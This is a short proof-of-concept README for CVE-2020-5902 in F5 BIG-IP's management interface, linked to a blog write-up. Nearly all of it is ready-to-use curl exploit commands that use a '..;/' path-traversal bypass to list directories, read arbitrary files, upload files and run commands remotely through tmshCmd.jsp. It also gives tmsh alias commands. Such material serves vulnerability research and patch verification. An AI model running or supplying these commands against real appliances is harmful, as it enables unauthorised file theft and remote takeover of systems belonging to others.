Proof of Concept for CVE-2020-5902# CVE-2020-5902
Proof of Concept for CVE-2020-5902
## Blog Post
https://medium.com/@un4gi/from-directory-traversal-to-rce-an-inside-look-at-cve-2020-5902-17bf483e4a9d
## List Files
- `curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/path/here/"`
## LFI
- `curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/path/to/file"`
## File Upload
- `curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=<filename>&content=<content>"`
## Adding tmsh cli Alias
- `tmsh create cli alias private <aliasname> command "command"`
## Deleting tmsh cli Alias
- `tmsh delete cli alias private <aliasname>`
## RCE
- `curl -v -k "https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=<command+here>"`
[4.0K] /data/pocs/f6269bc64427c6d7180c99a24d5bf5721cbb7756
└── [ 833] README.md
0 directories, 1 file